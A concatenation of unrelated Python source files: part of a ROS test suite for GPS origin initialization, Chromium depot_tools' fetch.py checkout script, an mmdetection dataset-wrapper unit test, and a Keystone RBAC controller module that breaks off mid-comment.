self.assertAlmostEqual(yaw, 0)
self.assertEqual(msg.header.frame_id, '/far_field')
if self.test_stamp:
self.assertEqual(msg.header.stamp, msg_stamp)
else:
self.assertNotEqual(msg.header.stamp, rospy.Time(0))
self.assertAlmostEqual(longitude, swri['longitude'])
self.assertAlmostEqual(latitude, swri['latitude'])
self.assertAlmostEqual(altitude, swri['altitude'])
rospy.signal_shutdown("Test complete")
class TestInvalidOrigin(unittest.TestCase):
def subscribeToOrigin(self):
# This line blocks until initialize_origin is alive and has advertised the origin topic
origin_class = rostopic.get_topic_class(ORIGIN_TOPIC, blocking=True)[0]
rospy.loginfo("Origin is a " + origin_class._type + " message")
self.assertIsNotNone(origin_class, msg=ORIGIN_TOPIC + " was never advertised")
self.assertIn(origin_class, ORIGIN_TYPES)
self.test_stamp = False # Enable this for auto origin
self.got_message = False
return rospy.Subscriber(ORIGIN_TOPIC, origin_class, self.originCallback)
def originCallback(self, msg):
rospy.logerr("Callback received a " + msg._type + " message.")
self.got_message = True
rospy.signal_shutdown("Test complete")
class TestAutoOriginFromGPSFix(TestInitializeOrigin):
def testAutoOriginFromGPSFix(self):
rospy.init_node('test_auto_origin_from_gps_fix')
gps_pub = rospy.Publisher('gps', GPSFix, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
gps_msg = GPSFix()
gps_msg.status.status = GPSStatus.STATUS_FIX
gps_msg.latitude = swri['latitude']
gps_msg.longitude = swri['longitude']
gps_msg.altitude = swri['altitude']
gps_msg.track = swri['heading']
gps_msg.header.stamp = msg_stamp
gps_pub.publish(gps_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestInvalidGPSFix(TestInvalidOrigin):
def testInvalidGPSFix(self):
rospy.init_node('test_invalid_gps_fix')
gps_pub = rospy.Publisher('gps', GPSFix, queue_size=2)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
gps_msg = GPSFix()
gps_msg.status.status = GPSStatus.STATUS_NO_FIX
gps_msg.header.stamp = msg_stamp
# There are two ways in which initialize_origin.py could fail due to getting
# an invalid fix: if it publishes an origin despite not getting a valid fix
# or if it unsubscribes from the gps & fix topics without ever publishing
# an origin.
# This will test for those conditions by waiting until the node has
# subscribed to the topic, then failing if either ROS shuts down, which
# our subscriber will do if it gets an origin message, or if the number of
# connections drops to zero, which means initialize_origin.py subscribed
# but did not publish a message.
r = rospy.Rate(100.0)
timeout = time.time() + 2 # time out after 2 seconds, which should be plenty
node_attached = False
while not rospy.is_shutdown() and time.time() < timeout:
if not node_attached and gps_pub.get_num_connections() > 0:
node_attached = True
if node_attached and gps_pub.get_num_connections() == 0:
break
gps_pub.publish(gps_msg)
r.sleep()
self.assertFalse(self.got_message,
"initialize_origin should not have published an origin.")
self.assertFalse(node_attached and gps_pub.get_num_connections() == 0,
"initialize_origin unsubscribed without getting a valid fix.")
class TestAutoOriginFromNavSatFix(TestInitializeOrigin):
def testAutoOriginFromNavSatFix(self):
rospy.init_node('test_auto_origin_from_nav_sat_fix')
nsf_pub = rospy.Publisher('fix', NavSatFix, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
nsf_msg = NavSatFix()
nsf_msg.status.status = NavSatStatus.STATUS_FIX
nsf_msg.latitude = swri['latitude']
nsf_msg.longitude = swri['longitude']
nsf_msg.altitude = swri['altitude']
nsf_msg.header.frame_id = "/far_field"
nsf_msg.header.stamp = msg_stamp
nsf_pub.publish(nsf_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestInvalidNavSatFix(TestInvalidOrigin):
def testInvalidNavSatFix(self):
rospy.init_node('test_invalid_nav_sat_fix')
nsf_pub = rospy.Publisher('fix', NavSatFix, queue_size=2)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
nsf_msg = NavSatFix()
nsf_msg.status.status = NavSatStatus.STATUS_NO_FIX
nsf_msg.header.frame_id = "/far_field"
nsf_msg.header.stamp = msg_stamp
# See documentation in testInvalidGPSFix.
r = rospy.Rate(100.0)
timeout = time.time() + 2 # time out after 2 seconds, which should be plenty
node_attached = False
while not rospy.is_shutdown() and time.time() < timeout:
if not node_attached and nsf_pub.get_num_connections() > 0:
node_attached = True
if node_attached and nsf_pub.get_num_connections() == 0:
break
nsf_pub.publish(nsf_msg)
r.sleep()
self.assertFalse(self.got_message,
"initialize_origin should not have published an origin.")
self.assertFalse(node_attached and nsf_pub.get_num_connections() == 0,
"initialize_origin unsubscribed without getting a valid fix.")
class TestAutoOriginFromCustom(TestInitializeOrigin):
def testAutoOriginFromCustom(self):
rospy.init_node('test_auto_origin_from_custom')
custom_pub = rospy.Publisher('pose', GeoPoseStamped, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
custom_msg = GeoPoseStamped()
custom_msg.pose.position.latitude = swri['latitude']
custom_msg.pose.position.longitude = swri['longitude']
custom_msg.pose.position.altitude = swri['altitude']
custom_msg.header.frame_id = "/far_field"
custom_msg.header.stamp = msg_stamp
custom_pub.publish(custom_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestManualOrigin(TestInitializeOrigin):
def testManualOrigin(self):
rospy.init_node('test_manual_origin')
origin_sub = self.subscribeToOrigin()
rospy.spin()
self.assertTrue(self.got_origin)
if __name__ == "__main__":
if sys.argv[1] == "auto_custom":
rostest.rosrun(PKG, NAME, TestAutoOriginFromCustom, sys.argv)
elif sys.argv[1] == "auto_gps":
rostest.rosrun(PKG, NAME, TestAutoOriginFromGPSFix, sys.argv)
elif sys.argv[1] == "auto_navsat":
rostest.rosrun(PKG, NAME, TestAutoOriginFromNavSatFix, sys.argv)
elif sys.argv[1] == "invalid_gps":
rostest.rosrun(PKG, NAME, TestInvalidGPSFix, sys.argv)
elif sys.argv[1] == "invalid_navsat":
rostest.rosrun(PKG, NAME, TestInvalidNavSatFix, sys.argv)
elif sys.argv[1] == "manual":
rostest.rosrun(PKG, NAME, TestManualOrigin, sys.argv)
|
|
#!/usr/bin/env vpython
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to perform checkouts in one easy command line!
Usage:
fetch <config> [--property=value [--property2=value2 ...]]
This script is a wrapper around various version control and repository
checkout commands. It requires a |config| name, fetches data from that
config in depot_tools/fetch_configs, and then performs all necessary inits,
checkouts, pulls, fetches, etc.
Optional arguments may be passed on the command line in key-value pairs.
These parameters will be passed through to the config's main method.
"""
from __future__ import print_function
import json
import optparse
import os
import pipes
import subprocess
import sys
import textwrap
import git_common
from distutils import spawn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
#################################################
# Checkout class definitions.
#################################################
class Checkout(object):
"""Base class for implementing different types of checkouts.
Attributes:
|base|: the absolute path of the directory in which this script is run.
|spec|: the spec for this checkout as returned by the config. Different
subclasses will expect different keys in this dictionary.
|root|: the directory into which the checkout will be performed, as returned
by the config. This is a relative path from |base|.
"""
def __init__(self, options, spec, root):
self.base = os.getcwd()
self.options = options
self.spec = spec
self.root = root
def exists(self):
"""Check does this checkout already exist on desired location"""
pass
def init(self):
pass
def run(self, cmd, return_stdout=False, **kwargs):
print('Running: %s' % (' '.join(pipes.quote(x) for x in cmd)))
if self.options.dry_run:
return ''
if return_stdout:
return subprocess.check_output(cmd, **kwargs).decode()
else:
try:
subprocess.check_call(cmd, **kwargs)
except subprocess.CalledProcessError as e:
# If the subprocess failed, it likely emitted its own distress message
# already - don't scroll that message off the screen with a stack trace
# from this program as well. Emit a terse message and bail out here;
# otherwise a later step will try doing more work and may hide the
# subprocess message.
print('Subprocess failed with return code %d.' % e.returncode)
sys.exit(e.returncode)
return ''
class GclientCheckout(Checkout):
def run_gclient(self, *cmd, **kwargs):
if not spawn.find_executable('gclient'):
cmd_prefix = (sys.executable, os.path.join(SCRIPT_PATH, 'gclient.py'))
else:
cmd_prefix = ('gclient',)
return self.run(cmd_prefix + cmd, **kwargs)
def exists(self):
try:
gclient_root = self.run_gclient('root', return_stdout=True).strip()
return (os.path.exists(os.path.join(gclient_root, '.gclient')) or
os.path.exists(os.path.join(os.getcwd(), self.root)))
except subprocess.CalledProcessError:
pass
return os.path.exists(os.path.join(os.getcwd(), self.root))
class GitCheckout(Checkout):
def run_git(self, *cmd, **kwargs):
print('Running: git %s' % (' '.join(pipes.quote(x) for x in cmd)))
if self.options.dry_run:
return ''
return git_common.run(*cmd, **kwargs)
class GclientGitCheckout(GclientCheckout, GitCheckout):
def __init__(self, options, spec, root):
super(GclientGitCheckout, self).__init__(options, spec, root)
assert 'solutions' in self.spec
def _format_spec(self):
def _format_literal(lit):
if isinstance(lit, str) or (sys.version_info.major == 2 and
isinstance(lit, unicode)):
return '"%s"' % lit
if isinstance(lit, list):
return '[%s]' % ', '.join(_format_literal(i) for i in lit)
return '%r' % lit
soln_strings = []
for soln in self.spec['solutions']:
soln_string = '\n'.join(' "%s": %s,' % (key, _format_literal(value))
for key, value in soln.items())
soln_strings.append(' {\n%s\n },' % soln_string)
gclient_spec = 'solutions = [\n%s\n]\n' % '\n'.join(soln_strings)
extra_keys = ['target_os', 'target_os_only', 'cache_dir']
gclient_spec += ''.join('%s = %s\n' % (key, _format_literal(self.spec[key]))
for key in extra_keys if key in self.spec)
return gclient_spec
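  # The spec string produced by _format_spec() looks like the following
  # (solution values here are hypothetical):
  #   solutions = [
  #     {
  #       "name": "src",
  #       "url": "https://chromium.example/src.git",
  #     },
  #   ]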
def init(self):
# Configure and do the gclient checkout.
self.run_gclient('config', '--spec', self._format_spec())
sync_cmd = ['sync']
if self.options.nohooks:
sync_cmd.append('--nohooks')
if self.options.no_history:
sync_cmd.append('--no-history')
if self.spec.get('with_branch_heads', False):
sync_cmd.append('--with_branch_heads')
self.run_gclient(*sync_cmd)
# Configure git.
wd = os.path.join(self.base, self.root)
if self.options.dry_run:
print('cd %s' % wd)
self.run_git(
'submodule', 'foreach',
'git config -f $toplevel/.git/config submodule.$name.ignore all',
cwd=wd)
if not self.options.no_history:
self.run_git(
'config', '--add', 'remote.origin.fetch',
'+refs/tags/*:refs/tags/*', cwd=wd)
self.run_git('config', 'diff.ignoreSubmodules', 'all', cwd=wd)
CHECKOUT_TYPE_MAP = {
'gclient': GclientCheckout,
'gclient_git': GclientGitCheckout,
'git': GitCheckout,
}
def CheckoutFactory(type_name, options, spec, root):
"""Factory to build Checkout class instances."""
class_ = CHECKOUT_TYPE_MAP.get(type_name)
if not class_:
raise KeyError('unrecognized checkout type: %s' % type_name)
return class_(options, spec, root)
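# Usage sketch (illustrative only): given a config whose type is
# 'gclient_git', the factory resolves the class from CHECKOUT_TYPE_MAP and
# instantiates it:
#   checkout = CheckoutFactory('gclient_git', options, spec['gclient_git_spec'], root)
#   if not checkout.exists():
#       checkout.init()
# An unrecognized type name raises KeyError, which run() below turns into a
# non-zero exit status.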
#################################################
# Utility function and file entry point.
#################################################
def usage(msg=None):
"""Print help and exit."""
if msg:
print('Error:', msg)
print(textwrap.dedent("""\
usage: %s [options] <config> [--property=value [--property2=value2 ...]]
This script can be used to download the Chromium sources. See
http://www.chromium.org/developers/how-tos/get-the-code
for full usage instructions.
Valid options:
-h, --help, help Print this message.
--nohooks Don't run hooks after checkout.
--force (dangerous) Don't look for existing .gclient file.
-n, --dry-run Don't run commands, only print them.
--no-history Perform shallow clones, don't fetch the full git history.
Valid fetch configs:""") % os.path.basename(sys.argv[0]))
configs_dir = os.path.join(SCRIPT_PATH, 'fetch_configs')
configs = [f[:-3] for f in os.listdir(configs_dir) if f.endswith('.py')]
configs.sort()
for fname in configs:
print(' ' + fname)
sys.exit(bool(msg))
def handle_args(argv):
"""Gets the config name from the command line arguments."""
if len(argv) <= 1:
usage('Must specify a config.')
if argv[1] in ('-h', '--help', 'help'):
usage()
dry_run = False
nohooks = False
no_history = False
force = False
while len(argv) >= 2:
arg = argv[1]
if not arg.startswith('-'):
break
argv.pop(1)
if arg in ('-n', '--dry-run'):
dry_run = True
elif arg == '--nohooks':
nohooks = True
elif arg == '--no-history':
no_history = True
elif arg == '--force':
force = True
else:
usage('Invalid option %s.' % arg)
def looks_like_arg(arg):
return arg.startswith('--') and arg.count('=') == 1
bad_parms = [x for x in argv[2:] if not looks_like_arg(x)]
if bad_parms:
usage('Got bad arguments %s' % bad_parms)
config = argv[1]
props = argv[2:]
return (
optparse.Values({
'dry_run': dry_run,
'nohooks': nohooks,
'no_history': no_history,
'force': force}),
config,
props)
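# Example (illustrative): for a command line such as
#   fetch --no-history chromium --target_os=android
# handle_args() returns options with no_history=True, config='chromium' and
# props=['--target_os=android']; the props are later forwarded unchanged to
# the config's fetch method by run_config_fetch().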
def run_config_fetch(config, props, aliased=False):
"""Invoke a config's fetch method with the passed-through args
and return its json output as a python object."""
config_path = os.path.abspath(
os.path.join(SCRIPT_PATH, 'fetch_configs', config))
if not os.path.exists(config_path + '.py'):
print("Could not find a config for %s" % config)
sys.exit(1)
cmd = [sys.executable, config_path + '.py', 'fetch'] + props
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
spec = json.loads(result.decode("utf-8"))
if 'alias' in spec:
assert not aliased
return run_config_fetch(
spec['alias']['config'], spec['alias']['props'] + props, aliased=True)
cmd = [sys.executable, config_path + '.py', 'root']
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
root = json.loads(result.decode("utf-8"))
return spec, root
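# Illustrative example of the alias mechanism: if a config's fetch output
# were {'alias': {'config': 'chromium', 'props': ['--foo=1']}}, the function
# re-invokes itself once for 'chromium' with ['--foo=1'] prepended to the
# user-supplied props; the 'aliased' flag asserts that this indirection is at
# most one level deep.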
def run(options, spec, root):
"""Perform a checkout with the given type and configuration.
Args:
options: Options instance.
spec: Checkout configuration returned by the config's fetch_spec
method (checkout type, repository url, etc.).
root: The directory into which the repo expects to be checked out.
"""
assert 'type' in spec
checkout_type = spec['type']
checkout_spec = spec['%s_spec' % checkout_type]
try:
checkout = CheckoutFactory(checkout_type, options, checkout_spec, root)
except KeyError:
return 1
if not options.force and checkout.exists():
print('Your current directory appears to already contain, or be part of, ')
print('a checkout. "fetch" is used only to get new checkouts. Use ')
print('"gclient sync" to update existing checkouts.')
print()
print('Fetch also does not yet deal with partial checkouts, so if fetch')
print('failed, delete the checkout and start over (crbug.com/230691).')
return 1
return checkout.init()
def main():
options, config, props = handle_args(sys.argv)
spec, root = run_config_fetch(config, props)
return run(options, spec, root)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
|
# Copyright (c) OpenMMLab. All rights reserved.
import bisect
import math
from collections import defaultdict
from unittest.mock import MagicMock
import numpy as np
import pytest
from mmdet.datasets import (ClassBalancedDataset, ConcatDataset, CustomDataset,
MultiImageMixDataset, RepeatDataset)
def test_dataset_wrapper():
CustomDataset.load_annotations = MagicMock()
CustomDataset.__getitem__ = MagicMock(side_effect=lambda idx: idx)
dataset_a = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_a = 10
cat_ids_list_a = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_a)
]
ann_info_list_a = []
for _ in range(len_a):
height = np.random.randint(10, 30)
width = np.random.randint(10, 30)
img = np.ones((height, width, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
ann_info_list_a.append(
dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
dataset_a.data_infos = MagicMock()
dataset_a.data_infos.__len__.return_value = len_a
dataset_a.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_a[idx])
dataset_a.get_ann_info = MagicMock(
side_effect=lambda idx: ann_info_list_a[idx])
dataset_b = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_b = 20
cat_ids_list_b = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_b)
]
ann_info_list_b = []
for _ in range(len_b):
height = np.random.randint(10, 30)
width = np.random.randint(10, 30)
img = np.ones((height, width, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
ann_info_list_b.append(
dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
dataset_b.data_infos = MagicMock()
dataset_b.data_infos.__len__.return_value = len_b
dataset_b.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_b[idx])
dataset_b.get_ann_info = MagicMock(
side_effect=lambda idx: ann_info_list_b[idx])
concat_dataset = ConcatDataset([dataset_a, dataset_b])
assert concat_dataset[5] == 5
assert concat_dataset[25] == 15
assert concat_dataset.get_cat_ids(5) == cat_ids_list_a[5]
assert concat_dataset.get_cat_ids(25) == cat_ids_list_b[15]
assert concat_dataset.get_ann_info(5) == ann_info_list_a[5]
assert concat_dataset.get_ann_info(25) == ann_info_list_b[15]
assert len(concat_dataset) == len(dataset_a) + len(dataset_b)
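# The index arithmetic above mirrors the cumulative-size lookup performed by
# ConcatDataset (a minimal sketch, assuming torch-style cumulative indexing):
#   import bisect
#   cumulative = [10, 30]                               # len_a, len_a + len_b
#   dataset_idx = bisect.bisect_right(cumulative, 25)   # -> 1 (dataset_b)
#   local_idx = 25 - cumulative[dataset_idx - 1]        # -> 15
# which is why concat_dataset[25] returns 15 with the mocked __getitem__.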
# Test if ConcatDataset allows dataset classes without the PALETTE
# attribute
palette_backup = CustomDataset.PALETTE
delattr(CustomDataset, 'PALETTE')
concat_dataset = ConcatDataset([dataset_a, dataset_b])
assert concat_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
repeat_dataset = RepeatDataset(dataset_a, 10)
assert repeat_dataset[5] == 5
assert repeat_dataset[15] == 5
assert repeat_dataset[27] == 7
assert repeat_dataset.get_cat_ids(5) == cat_ids_list_a[5]
assert repeat_dataset.get_cat_ids(15) == cat_ids_list_a[5]
assert repeat_dataset.get_cat_ids(27) == cat_ids_list_a[7]
assert repeat_dataset.get_ann_info(5) == ann_info_list_a[5]
assert repeat_dataset.get_ann_info(15) == ann_info_list_a[5]
assert repeat_dataset.get_ann_info(27) == ann_info_list_a[7]
assert len(repeat_dataset) == 10 * len(dataset_a)
# Test if RepeatDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
repeat_dataset = RepeatDataset(dataset_a, 10)
assert repeat_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
category_freq = defaultdict(int)
for cat_ids in cat_ids_list_a:
cat_ids = set(cat_ids)
for cat_id in cat_ids:
category_freq[cat_id] += 1
for k, v in category_freq.items():
category_freq[k] = v / len(cat_ids_list_a)
mean_freq = np.mean(list(category_freq.values()))
repeat_thr = mean_freq
category_repeat = {
cat_id: max(1.0, math.sqrt(repeat_thr / cat_freq))
for cat_id, cat_freq in category_freq.items()
}
repeat_factors = []
for cat_ids in cat_ids_list_a:
cat_ids = set(cat_ids)
repeat_factor = max({category_repeat[cat_id] for cat_id in cat_ids})
repeat_factors.append(math.ceil(repeat_factor))
repeat_factors_cumsum = np.cumsum(repeat_factors)
repeat_factor_dataset = ClassBalancedDataset(dataset_a, repeat_thr)
assert len(repeat_factor_dataset) == repeat_factors_cumsum[-1]
for idx in np.random.randint(0, len(repeat_factor_dataset), 3):
assert repeat_factor_dataset[idx] == bisect.bisect_right(
repeat_factors_cumsum, idx)
assert repeat_factor_dataset.get_ann_info(idx) == ann_info_list_a[
bisect.bisect_right(repeat_factors_cumsum, idx)]
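# Worked example of the repeat-factor formula used above (illustrative
# numbers): with repeat_thr == 0.5 and a category appearing in 12.5% of the
# images, the per-category factor is max(1.0, sqrt(0.5 / 0.125)) == 2.0; each
# image takes the maximum factor over its categories, and the cumulative sum
# of the ceiled per-image factors gives len(ClassBalancedDataset), which is
# exactly what the assertions above check.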
# Test if ClassBalancedDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
repeat_factor_dataset = ClassBalancedDataset(dataset_a, repeat_thr)
assert repeat_factor_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
img_scale = (60, 60)
pipeline = [
dict(type='Mosaic', img_scale=img_scale, pad_val=114.0),
dict(
type='RandomAffine',
scaling_ratio_range=(0.1, 2),
border=(-img_scale[0] // 2, -img_scale[1] // 2)),
dict(
type='MixUp',
img_scale=img_scale,
ratio_range=(0.8, 1.6),
pad_val=114.0),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Resize', img_scale=img_scale, keep_ratio=True),
dict(type='Pad', pad_to_square=True, pad_val=114.0),
]
CustomDataset.load_annotations = MagicMock()
results = []
for _ in range(2):
height = np.random.randint(10, 30)
width = np.random.randint(10, 30)
img = np.ones((height, width, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
results.append(dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
CustomDataset.__getitem__ = MagicMock(side_effect=lambda idx: results[idx])
dataset_a = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_a = 2
cat_ids_list_a = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_a)
]
dataset_a.data_infos = MagicMock()
dataset_a.data_infos.__len__.return_value = len_a
dataset_a.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_a[idx])
# test dynamic_scale deprecated
with pytest.raises(RuntimeError):
MultiImageMixDataset(dataset_a, pipeline, (80, 80))
multi_image_mix_dataset = MultiImageMixDataset(dataset_a, pipeline)
for idx in range(len_a):
results_ = multi_image_mix_dataset[idx]
assert results_['img'].shape == (img_scale[0], img_scale[1], 3)
# test skip_type_keys
multi_image_mix_dataset = MultiImageMixDataset(
dataset_a,
pipeline,
skip_type_keys=('MixUp', 'RandomFlip', 'Resize', 'Pad'))
for idx in range(len_a):
results_ = multi_image_mix_dataset[idx]
assert results_['img'].shape == (img_scale[0], img_scale[1], 3)
# Test if MultiImageMixDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
multi_image_mix_dataset = MultiImageMixDataset(dataset_a, pipeline)
assert multi_image_mix_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import uuid
import six
from keystone.common import authorization
from keystone.common import dependency
from keystone.common import driver_hints
from keystone.common import utils
from keystone.common import wsgi
from keystone import config
from keystone import exception
from keystone.i18n import _
from keystone.models import token_model
from keystone.openstack.common import log
LOG = log.getLogger(__name__)
CONF = config.CONF
def v2_deprecated(f):
"""No-op decorator in preparation for deprecating Identity API v2.
This is a placeholder for the pending deprecation of v2. The implementation
of this decorator can be replaced with::
from keystone.openstack.common import versionutils
v2_deprecated = versionutils.deprecated(
what='v2 API',
as_of=versionutils.deprecated.JUNO,
in_favor_of='v3 API')
"""
return f
def _build_policy_check_credentials(self, action, context, kwargs):
LOG.debug('RBAC: Authorizing %(action)s(%(kwargs)s)', {
'action': action,
'kwargs': ', '.join(['%s=%s' % (k, kwargs[k]) for k in kwargs])})
# see if auth context has already been created. If so use it.
if ('environment' in context and
authorization.AUTH_CONTEXT_ENV in context['environment']):
LOG.debug('RBAC: using auth context from the request environment')
return context['environment'].get(authorization.AUTH_CONTEXT_ENV)
# There is no current auth context, build it from the incoming token.
# TODO(morganfainberg): Collapse this logic with AuthContextMiddleware
# in a sane manner as this just mirrors the logic in AuthContextMiddleware
try:
LOG.debug('RBAC: building auth context from the incoming auth token')
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
# NOTE(jamielennox): whilst this maybe shouldn't be within this
# function it would otherwise need to reload the token_ref from
# backing store.
wsgi.validate_token_bind(context, token_ref)
except exception.TokenNotFound:
LOG.warning(_('RBAC: Invalid token'))
raise exception.Unauthorized()
auth_context = authorization.token_to_auth_context(token_ref)
return auth_context
def protected(callback=None):
"""Wraps API calls with role based access controls (RBAC).
This handles both the protection of the API parameters and any
target entities for single-entity API calls.
More complex API calls (for example those that deal with several different
entities) should pass in a callback function, which will subsequently be
called to check protection for these multiple entities. This callback
function should gather the appropriate entities needed and then call
check_protection() in the V3Controller class.
"""
def wrapper(f):
@functools.wraps(f)
def inner(self, context, *args, **kwargs):
if 'is_admin' in context and context['is_admin']:
LOG.warning(_('RBAC: Bypassing authorization'))
elif callback is not None:
prep_info = {'f_name': f.__name__,
'input_attr': kwargs}
callback(self, context, prep_info, *args, **kwargs)
else:
action = 'identity:%s' % f.__name__
creds = _build_policy_check_credentials(self, action,
context, kwargs)
policy_dict = {}
# Check to see if we need to include the target entity in our
# policy checks. We deduce this by seeing if the class has
# specified a get_member() method and that kwargs contains the
# appropriate entity id.
if (hasattr(self, 'get_member_from_driver') and
self.get_member_from_driver is not None):
key = '%s_id' % self.member_name
if key in kwargs:
ref = self.get_member_from_driver(kwargs[key])
policy_dict['target'] = {self.member_name: ref}
# TODO(henry-nash): Move this entire code to a member
# method inside v3 Auth
if context.get('subject_token_id') is not None:
token_ref = token_model.KeystoneToken(
token_id=context['subject_token_id'],
token_data=self.token_provider_api.validate_token(
context['subject_token_id']))
policy_dict.setdefault('target', {})
policy_dict['target'].setdefault(self.member_name, {})
policy_dict['target'][self.member_name]['user_id'] = (
token_ref.user_id)
try:
user_domain_id = token_ref.user_domain_id
except exception.UnexpectedError:
user_domain_id = None
if user_domain_id:
policy_dict['target'][self.member_name].setdefault(
'user', {})
policy_dict['target'][self.member_name][
'user'].setdefault('domain', {})
policy_dict['target'][self.member_name]['user'][
'domain']['id'] = (
user_domain_id)
# Add in the kwargs, which means that any entity provided as a
# parameter for calls like create and update will be included.
policy_dict.update(kwargs)
self.policy_api.enforce(creds,
action,
utils.flatten_dict(policy_dict))
LOG.debug('RBAC: Authorization granted')
return f(self, context, *args, **kwargs)
return inner
return wrapper
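# Usage sketch (illustrative, not taken from this module): a v3 controller
# method is typically wrapped so the policy check runs before the body, e.g.
#   class UserV3(V3Controller):
#       @protected()
#       def get_user(self, context, user_id):
#           ...
# With no callback the enforced action is 'identity:get_user', and the
# keyword arguments (here user_id) are flattened into the policy target dict.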
def filterprotected(*filters):
"""Wraps filtered API calls with role based access controls (RBAC)."""
def _filterprotected(f):
@functools.wraps(f)
def wrapper(self, context, **kwargs):
if not context['is_admin']:
action = 'identity:%s' % f.__name__
creds = _build_policy_check_credentials(self, action,
context, kwargs)
# Now, build the target dict for policy check. We include:
#
# - Any query filter parameters
# - Data from the main url (which will be in the kwargs
# parameter) and would typically include the prime key
# of a get/update/delete call
#
# First any query filter parameters
target = dict()
if filters:
for item in filters:
if item in context['query_string']:
target[item] = context['query_string'][item]
LOG.debug('RBAC: Adding query filter params (%s)', (
', '.join(['%s=%s' % (item, target[item])
for item in target])))
# Now any formal url parameters
for key in kwargs:
target[key] = kwargs[key]
self.policy_api.enforce(creds,
action,
utils.flatten_dict(target))
LOG.debug('RBAC: Authorization granted')
else:
LOG.warning(_('RBAC: Bypassing authorization'))
return f(self, context, filters, **kwargs)
return wrapper
return _filterprotected
class V2Controller(wsgi.Application):
"""Base controller class for Identity API v2."""
def _normalize_domain_id(self, context, ref):
"""Fill in domain_id since v2 calls are not domain-aware.
This will overwrite any domain_id that was inadvertently
specified in the v2 call.
"""
ref['domain_id'] = CONF.identity.default_domain_id
return ref
@staticmethod
def filter_domain_id(ref):
"""Remove domain_id since v2 calls are not domain-aware."""
ref.pop('domain_id', None)
return ref
@staticmethod
def normalize_username_in_response(ref):
"""Adds username to outgoing user refs to match the v2 spec.
Internally we use `name` to represent a user's name. The v2 spec
requires the use of `username` instead.
"""
if 'username' not in ref and 'name' in ref:
ref['username'] = ref['name']
return ref
@staticmethod
def normalize_username_in_request(ref):
"""Adds name in incoming user refs to match the v2 spec.
Internally we use `name` to represent a user's name. The v2 spec
requires the use of `username` instead.
"""
if 'name' not in ref and 'username' in ref:
ref['name'] = ref.pop('username')
return ref
@staticmethod
def v3_to_v2_user(ref):
"""Convert a user_ref from v3 to v2 compatible.
* v2.0 users are not domain aware, and should have domain_id removed
* v2.0 users expect the use of tenantId instead of default_project_id
* v2.0 users have a username attribute
This method should only be applied to user_refs being returned from the
v2.0 controller(s).
If ref is a list type, we will iterate through each element and do the
conversion.
"""
def _format_default_project_id(ref):
"""Convert default_project_id to tenantId for v2 calls."""
default_project_id = ref.pop('default_project_id', None)
if default_project_id is not None:
ref['tenantId'] = default_project_id
elif 'tenantId' in ref:
# NOTE(morganfainberg): To avoid v2.0 confusion if somehow a
# tenantId property sneaks its way into the extra blob on the
# user, we remove it here. If default_project_id is set, we
# would override it in either case.
del ref['tenantId']
def _normalize_and_filter_user_properties(ref):
"""Run through the various filter/normalization methods."""
_format_default_project_id(ref)
V2Controller.filter_domain_id(ref)
V2Controller.normalize_username_in_response(ref)
return ref
if isinstance(ref, dict):
return _normalize_and_filter_user_properties(ref)
elif isinstance(ref, list):
return [_normalize_and_filter_user_properties(x) for x in ref]
else:
raise ValueError(_('Expected dict or list: %s') % type(ref))
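# Example of the conversion performed above (illustrative values): a v3 ref
# such as
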